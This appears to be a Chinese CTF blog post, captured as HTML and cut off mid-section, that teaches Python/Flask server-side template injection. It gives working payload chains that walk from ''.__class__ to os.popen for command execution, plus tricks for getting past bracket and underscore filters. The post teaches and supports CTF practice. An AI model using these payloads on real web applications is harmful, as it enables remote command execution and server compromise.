<!DOCTYPE html>
<html lang="zh-CN">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="lexsd6" />



<meta name="description" content="0x1关于ssti的讲解1.什么是ssti? SSTI就是服务器端模板注入(Server-Side Template Injection).在一般的ctf中主要考查python比较多，故这篇文章主要是分析python下的ssti。">
<meta property="og:type" content="article">
<meta property="og:title" content="关于python ssti的思考">
<meta property="og:url" content="lexsd6.github.io/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/index.html">
<meta property="og:site_name" content="lexsd6&#39;s home">
<meta property="og:description" content="0x1关于ssti的讲解1.什么是ssti? SSTI就是服务器端模板注入(Server-Side Template Injection).在一般的ctf中主要考查python比较多，故这篇文章主要是分析python下的ssti。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="lexsd6.github.io/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/image-20200327224713117.png">
<meta property="article:published_time" content="2020-03-27T01:51:37.734Z">
<meta property="article:modified_time" content="2020-11-27T09:35:29.923Z">
<meta property="article:author" content="lexsd6">
<meta property="article:tag" content="web">
<meta property="article:tag" content="python">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="lexsd6.github.io/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/image-20200327224713117.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="lexsd6&#39;s home" type="application/atom+xml">



    <link rel="shortcut icon" href="/title.ico">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>关于python ssti的思考 | lexsd6&#39;s home</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 4.2.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/lexsd6.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">lexsd6</a></h1>
        </hgroup>

        
        <p class="header-subtitle"> Clumsy birds have to start flying early</p>
        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="false" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:lexsd6@foxmail.com" title="Email"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa QQ" href="tencent://message/?uin=2927507170&Menu=yes" title="QQ"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/" rel="tag">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/crypto/" rel="tag">crypto</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ida/" rel="tag">ida</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/libc/" rel="tag">libc</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mics/" rel="tag">mics</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mysql/" rel="tag">mysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/problem-resolve/" rel="tag">problem_resolve</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/" rel="tag">sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/translate/" rel="tag">translate</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io" target="_blank" rel="noopener">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/" target="_blank" rel="noopener">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/" target="_blank" rel="noopener">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">一梦想成为五边形战士的老菜鸡</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">lexsd6</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/lexsd6.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">lexsd6</a></h1>
            </hgroup>
            
            <p class="header-subtitle"> Clumsy birds have to start flying early</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:lexsd6@foxmail.com" title="Email"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa QQ" target="_blank" href="tencent://message/?uin=2927507170&Menu=yes" title="QQ"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-python 关于沙盒逃逸的思考" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/" class="article-date">
      <time datetime="2020-03-27T01:51:37.734Z" itemprop="datePublished">2020-03-27</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      关于python ssti的思考
    </h1>
  


          <div style="margin-top:10px ;">
    <span class="post-time">
      <span class="post-meta-item-icon">
        <i class="fa fa-keyboard-o"></i>
        <span class="post-meta-item-text">  字数统计: </span>
        <span class="post-count">3.4k字</span>
      </span>
    </span>
    <span class="post-time">
      &nbsp; | &nbsp;
      <span class="post-meta-item-icon">
        <i class="fa fa-hourglass-half"></i>
        <span class="post-meta-item-text">阅读时长:</span>
        <span class="post-count">14分</span>
      </span>
    </span>
</div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
          
      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
    </div>


        
    <div class="article-tag tagcloud" >
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>

    </div>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x1关于ssti的讲解"><a href="#0x1关于ssti的讲解" class="headerlink" title="0x1关于ssti的讲解"></a>0x1关于ssti的讲解</h2><p>1.什么是ssti?</p>
<p>SSTI就是服务器端模板注入(Server-Side Template Injection).在一般的ctf中主要考查python比较多，故这篇文章主要是分析python下的ssti。</p>
<a id="more"></a>
<p>2.ssti出现的原因</p>
<p>ssti起因是在通过与服务端模板的输入输出交互时,服务器端把用户提交的数据处理,当成了代码来执行.从而让恶意用户通过构建了恶意代码,来读取了服务器上的信息或得到了服务器的shell.例如：在python的flask中，会把<code>{ {</code> <code>} }</code>号里面的参数当成代码来执行，如<code>{ {1+1} }</code>会被执行成为<code>{ {2} }</code>。</p>
<p>3.ssti漏洞的发现</p>
<p>对目标机构造payload来分析，如<code>{ {7+7} }</code>，<code>{ {&#39;7&#39;+&#39;7&#39;} }</code>等。看是否有ssti。再参考下图分析是何种模板的ssti</p>
<p><img src="image-20200327224713117.png" alt="image-20200327224713117"></p>
<p>​    </p>
<h2 id="0x2python基础"><a href="#0x2python基础" class="headerlink" title="0x2python基础"></a>0x2python基础</h2><h3 id="01-python魔术方法"><a href="#01-python魔术方法" class="headerlink" title="01.python魔术方法"></a>01.python魔术方法</h3><p>由于python的语法一贯奉行“一切皆是对象”的原则，所以python的一切变量都由类实例而来同时python有很多管理这些类与对象的内置魔术方法或函数。下面介绍几个常用的与类有关的魔术方法。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>） __class__</span><br><span class="line"><span class="comment">#__class__功能和type()函数一样，都是查看对象所在的类（子实例找父实例）。</span></span><br><span class="line"><span class="number">2</span>）__base__</span><br><span class="line"><span class="comment">#__base__的作用是查询一个类的父类。</span></span><br><span class="line"><span class="number">3</span>）__mro__</span><br><span class="line"><span class="comment">#返回包含回朔一个类所由继承过的父类的元组。</span></span><br><span class="line"><span class="number">4</span>）__subclasses__()</span><br><span class="line"><span class="comment">#返回包含一个类的所有子类的列表。</span></span><br><span class="line"><span class="number">5</span>）__builtins__()</span><br><span class="line"><span class="comment">#builtins就是内置模块的一个引用。像__import__()、open、eval等内置函数所在的模块就内置模块。大多数模块都将名称 __builtins__ 作为其全局变量的一部分.</span></span><br><span class="line"><span class="number">6</span>）__init__</span><br><span class="line"><span class="comment">#类实例化出一个对象时进行初始化方法。</span></span><br><span class="line"><span class="number">7</span>）__globals__</span><br><span class="line"><span class="comment">#返回一个函数所在空间的所有类、属性、子模块与方法的字典。</span></span><br><span class="line"><span class="number">8</span>）__dict__</span><br><span class="line"><span class="comment">#返回包含一个模块所拥有类、属性、子模块与方法的字典。</span></span><br><span class="line"><span class="number">9</span>）__getattribute__</span><br><span class="line"><span class="comment">#虽然这个魔术方法该方法可以拦截对对象属性的所有访问企图。但也有访问对象属性的功能。可以用来进行一些绕过。</span></span><br></pre></td></tr></table></figure>

<h3 id="02-文件操作和命令执行相关的python模块"><a href="#02-文件操作和命令执行相关的python模块" class="headerlink" title="02.文件操作和命令执行相关的python模块"></a>02.文件操作和命令执行相关的python模块</h3><h6 id="1-builtins模块"><a href="#1-builtins模块" class="headerlink" title="1)builtins模块"></a>1)builtins模块</h6><p>是python的一个内置函数所在模块,里面的函数无需import就能访问。</p>
<ol>
<li><p>eval()</p>
<p>执行1句简单的python代码，并返回结果。</p>
</li>
<li><p>exec()</p>
<p>执行多句python代码，但返回值永远为None。</p>
</li>
<li><p>open()</p>
<p>打开一个文件</p>
</li>
</ol>
<h6 id="2）os模块"><a href="#2）os模块" class="headerlink" title="2）os模块"></a>2）os模块</h6><p>该模块提供了一些方便使用操作系统相关功能的函数。这主要说与文件操作和命令执行相关的函数</p>
<ol>
<li><p>os.system  (cmd)</p>
<p>执行操作系统(shell)命令，若执行成功返回值为0。</p>
</li>
<li><p>os.popen(cmd)  .read()</p>
<p>os.popen()函数可以用来执行操作系统(shell)命令。通过read()函数来读取返回结果。除此外还有so.popen2(),so.popen3().</p>
</li>
<li><p>os.open(filename)</p>
<p>可以用来打开读取文件。</p>
</li>
</ol>
<h6 id="3-platform模块"><a href="#3-platform模块" class="headerlink" title="3)platform模块"></a>3)platform模块</h6><p> python中，platform模块给我们提供了很多方法去管理操作系统。</p>
<ol>
<li><p>platform.popen(cmd, mode=’r’, bufsize=None) </p>
<p>platform.popen函数可以用来执行操作系统(shell)命令。但与os.popen()函数通类似过read()函数来读取返回结果。                 </p>
</li>
</ol>
<h6 id="4-timeit-模块"><a href="#4-timeit-模块" class="headerlink" title="4)timeit 模块"></a>4)timeit 模块</h6><p>​        模块中的timeit.timeit() 本是检测性能的，也可以任意代码执行。但是没有回显。用法如timeit.timeit(“<strong>import</strong>(‘os’).system(cmd)”,number=1)         </p>
<h6 id="5-commands模块"><a href="#5-commands模块" class="headerlink" title="5)commands模块"></a>5)commands模块</h6><p>commands模块只存在于Python 2.7中，且不支持windows平台，因此commands模块很少被使用。另外，commands模块实际上也是通过对os.popen()的封装来完成的。</p>
<ol>
<li><p>commands.getoutput(cmd)</p>
<p>接收字符串格式的命令，执行命令并返回执行结果。</p>
</li>
<li><p>commands.getstatusoutput(cmd)</p>
<p>执行cmd命令，返回一个元组(命令执行状态,命令执行结果输出)。</p>
</li>
</ol>
<h6 id="6-subprocess模块"><a href="#6-subprocess模块" class="headerlink" title="6)subprocess模块"></a>6)subprocess模块</h6><p>subprocess 模块允许你生成新的进程，连接它们的输入、输出、错误管道.此模块打算代替一些老旧的模块与功能如：os模块、commands模块等。</p>
<ol>
<li><p>subprocess.run(cmd)</p>
<p>Python 3.5版本以后才有的函数。执行指定的命令，等待命令执行完成后返回一个包含执行结果的CompletedProcess类的实例</p>
</li>
<li><p>subprocess.call(cmd,shell=True)</p>
<p>执行由参数提供的命令。我们可以用数组作为参数运行命令，也可以用字符串作为参数运行命令(通过设置参数shell=True)如果执行成功则返回状态码。</p>
</li>
<li><p>subprocess.check_call(cmd)</p>
<p>执行指定的命令，如果执行成功则返回状态码，否则抛出异常.</p>
</li>
<li><p>subprocess.check_output(cmd)</p>
<p>执行指定的命令，如果执行成功则返回结果，否则抛出异常.</p>
</li>
<li><p>subprocess.getstatusoutput(cmd)</p>
<p>执行cmd命令，返回一个元组(命令执行状态,命令执行结果输出)。</p>
</li>
<li><p>subprocess.getoutput(cmd)</p>
<p>接收字符串格式的命令，执行命令并返回执行结果。</p>
</li>
</ol>
<h3 id="03-一些提高效率的函数"><a href="#03-一些提高效率的函数" class="headerlink" title="03.一些提高效率的函数"></a>03.一些提高效率的函数</h3><p>1.index()</p>
<p>检查字符串是否包含某个字符或字符串。还有可以用来查询列表里是否有某个元素。若春在则返回第一次出现时的下标或索引。ps：当参数有.符号时可能出现该函数查不出来但存在的现象（解析逻辑问题）</p>
<p>2.keys()</p>
<p>将键的单独提取成一个列表。在某些过滤了中括号的情况下与index()用来代替中括号的效果。</p>
<h3 id="04-关于flask"><a href="#04-关于flask" class="headerlink" title="04.关于flask"></a>04.关于flask</h3><p>flask由 Jinja2 模板开发而来的web框架。缺省情况下，以下全局变量可以在 Jinja2 模板中使用，同时也值得我们关注：</p>
<h4 id="1-config"><a href="#1-config" class="headerlink" title="1) config"></a>1) config</h4><p>获取当前配置对象（ flask.config ）,可以得到些配置信息(有点类似php中phpinfo的作用).比如:是否打开session,SECRET_KEY(python默认的session加密方式的密钥）的值。</p>
<p>在 version 0.10后,这个变量总是可用，甚至是在被导入的模板中。</p>
<p>这个对象是在 version 0.6. 后才有的.</p>
<h4 id="2-request"><a href="#2-request" class="headerlink" title="2)request"></a>2)request</h4><p>获取请求对象（ flask.request ）。 在没有活动请求环境情况下渲染模板时，这个变量不可用。</p>
<h4 id="3-session"><a href="#3-session" class="headerlink" title="3)session"></a>3)session</h4><p>获取当前会话对象（ flask.session ）。 在没有活动请求环境情况下渲染模板时，这个变量不可用。</p>
<h4 id="4-g"><a href="#4-g" class="headerlink" title="4)g"></a>4)g</h4><p>请求绑定的全局变量（ flask.g ）。在flask中，有一个专门用来存储用户信息的g对象，g的全称的为global。g对象在一次请求中的所有的代码的地方，都是可以使用的。 在没有活动请求环境情况下渲染模板时，这个变量不可用。</p>
<h4 id="5-url-for"><a href="#5-url-for" class="headerlink" title="5)url_for()"></a>5)url_for()</h4><p>flask.url_for() 函数。url_for() 会返回传入的路由函数对应的URL，所谓路由函数就是被 app.route() 路由装饰器装饰的函数。如果我们定义的路由函数是带有参数的，则可以将这些参数作为命名参数传入。</p>
<h5 id="6-get-flashed-messages"><a href="#6-get-flashed-messages" class="headerlink" title="6)get_flashed_messages()"></a>6)get_flashed_messages()</h5><p>flask.get_flashed_messages() 函数。返回之前在Flask中通过 flash() 传入的信息列表。把字符串对象表示的消息加入到一个消息队列中，然后通过调用 get_flashed_messages() 方法取出。</p>
<h2 id="0x3ssti注入的一般攻击流程"><a href="#0x3ssti注入的一般攻击流程" class="headerlink" title="0x3ssti注入的一般攻击流程"></a>0x3ssti注入的一般攻击流程</h2><p>1.找到环境中的可以使用的环境变量,例如:内置函数方法（url_for()函数、get_flashed_messages()函数）、内置类的实例变量(‘’,[]，config，self)。</p>
<p>2.若已得到内置函数方法则跳第4步骤，从内置类的实例变量方向出发的通过类的关系通过<code>__class__、__base__ or  __mro__</code>找到基本类（object类）.注意：python2与python3这步有的差别。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python 2:</span></span><br><span class="line">	  <span class="comment"># __base__路线</span></span><br><span class="line">      <span class="string">''</span>.__class__.__base__.__base__</span><br><span class="line">      <span class="comment">#__mro__路线1</span></span><br><span class="line">       <span class="string">''</span>.__class__.__mro__[<span class="number">2</span>]</span><br><span class="line"><span class="comment">#python 3:</span></span><br><span class="line">       <span class="comment"># __base__路线</span></span><br><span class="line">       <span class="string">''</span>.__class__.__base__</span><br><span class="line">       <span class="comment">#__mro__路线1</span></span><br><span class="line">        <span class="string">''</span>.__class__.__mro__[<span class="number">1</span>]</span><br><span class="line">       </span><br><span class="line"> <span class="comment">#python 2/3 都可以用 的__mro__路线</span></span><br><span class="line">		<span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>]</span><br></pre></td></tr></table></figure>

<p>3.通过<code>__subclasses__()</code>获取所有object类的子类，并用 <code>__dict__</code>从中寻找类其拥有的方法。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()</span><br><span class="line"><span class="comment">#获取所有object类的子类</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[x].__dict__</span><br><span class="line"><span class="comment">#x表__subclasses__()返回列表的任意存在索引。</span></span><br><span class="line"><span class="comment">#__dict__ 中带有&lt;function __init__ at 0x7f8a189dc320&gt;  或&lt;unbound method WarningMessage.__init__&gt;就是我们可以利用的方法</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#大多数类重载的了__init__方法，__init__方法也有__globals__属性。因此我们可以直接遍历x找带有__init__的类。</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[x].__init__</span><br></pre></td></tr></table></figure>

<p>4.通过<code>__globals__</code>或<code>func_globals</code>得到的方法所在空间的所有类、属性、子模块与方法。例如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">url_for.func_globals</span><br><span class="line">url_for.__globals__</span><br><span class="line"></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].__init__.__globals__</span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].__init__.func_globals</span><br><span class="line"></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].reset.__globals__</span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].reset.func_globals</span><br></pre></td></tr></table></figure>

<p>5若上一步返回的结果里有需要的方法就可以直接调用;若想调用内置库的函数用<strong>builtins</strong> ;若想调用第三方库（模块）可以继续用<strong>import</strong>载入:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#若上一步返回的结果里有需要的方法就可以直接调用;</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].__init__.func_globals.getreader</span><br><span class="line"><span class="comment">#若想调用内置库的函数,利用__builtins__属性:</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].__init__.func_globals.__builtins__.eval()</span><br><span class="line"><span class="comment">#若想调用第三方库（模块）可以后加__import__载入;</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__()[<span class="number">78</span>].__init__.func_globals.__builtins__.__import__(<span class="string">'os'</span>).popen</span><br></pre></td></tr></table></figure>



<h2 id="0x4常见绕过方式"><a href="#0x4常见绕过方式" class="headerlink" title="0x4常见绕过方式"></a>0x4常见绕过方式</h2><h6 id="1-过滤中括号"><a href="#1-过滤中括号" class="headerlink" title="1)过滤中括号"></a>1)过滤中括号</h6><ol>
<li><p><code>__getitem__</code>方法，该方法用来获取指定索引对应的元素。</p>
<p>例如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>.__class__.__mro__.__getitem__(<span class="number">-1</span>).__subclasses__().__getitem__(<span class="number">40</span>)</span><br><span class="line"><span class="string">''</span>.__class__.__mro__.__getitem__(<span class="number">-1</span>).__subclasses__().__getitem__(<span class="number">79</span>).__init__.__globals__.__builtins__.__getitem__(<span class="string">'ord'</span>)</span><br><span class="line"><span class="comment">#这个操作对字典与列表都适用</span></span><br></pre></td></tr></table></figure>

<p>来获取<code>__mro__</code>所得元组的最后一个元素和<code>__subclasses__()</code>返回的列表里的索引为40的元素。</p>
</li>
<li><p>对于列表来,pop() 函数用于移除列表中的一个元素（默认最后一个元素），并且返回该元素的值。我们可以用pop() 来代替中括号。里使用pop并不会真的移除,但却能返回其值,取代中括号,来实现绕过。例如</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>.__class__.__base__.__subclasses__().pop(<span class="number">40</span>)</span><br><span class="line"><span class="comment">#这个只能用于列表</span></span><br></pre></td></tr></table></figure>

<p>来获得<code>__subclasses__()</code>返回的列表里的索引为40的元素。</p>
</li>
<li><p>对于字典来说,可以用’.’号来代替.在flask中的<code></code>号里’.’号有代替<code>[ ]</code>对字典进行索引读取的作用.例如:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>.__class__.__mro__.__getitem__(<span class="number">-1</span>).__subclasses__().__getitem__(<span class="number">79</span>).__init__.__globals__.__builtins__.ord</span><br><span class="line"><span class="comment">#这个只能用于字典</span></span><br></pre></td></tr></table></figure>

<p>来获得<code>__builtins__</code>返回的列表里的索引为’ord’的元素。</p>
</li>
</ol>
<h6 id="2-过滤双下划线"><a href="#2-过滤双下划线" class="headerlink" title="2)过滤双下划线"></a>2)过滤双下划线</h6><ol>
<li><p>request.args 是flask中的一个属性,为返回请求的参数,这里自己设置一个变量名,将后面的路径传值进来,进而绕过了’_’的过滤.</p>
<p>例如：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;""[request.args.class][request.args.x1][request.args.x2][request.args.x3]()[40]&#125;&#125;?class=__class__&amp;x1=__base__&amp;x2=__base__&amp;x3=__subclasses__</span><br></pre></td></tr></table></figure>

<p>通过自己设置变量class、x1、x2、x3来传递参数从而绕过。</p>
</li>
<li><p>同request.args，request.values也有类似的作用，不过要利用post的方式进行传参。</p>
</li>
<li><p>在<code>dir()</code>没有被ban下可以用<code>dir(0)[0][0]</code>来引入’_’.</p>
<p>例： </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[dir(<span class="number">0</span>)[<span class="number">0</span>][<span class="number">0</span>]+dir(<span class="number">0</span>)[<span class="number">0</span>][<span class="number">0</span>]+<span class="string">'class'</span>+dir(<span class="number">0</span>)[<span class="number">0</span>][<span class="number">0</span>]+dir(<span class="number">0</span>)[<span class="number">0</span>][<span class="number">0</span>]]</span><br><span class="line"><span class="comment">#等价于''.__class__（PS：在url中'+'号最好要编码成%2b！！！）</span></span><br></pre></td></tr></table></figure>



</li>
</ol>
<ol start="4">
<li><p>利用格式化字符串特性。用<code>&#39;{0:c}&#39;[&#39;format&#39;](95)</code>或<code>&quot;%c&quot;%(95)</code></p>
<p>以<code>&#39;&#39;.__class__</code>例:</p>
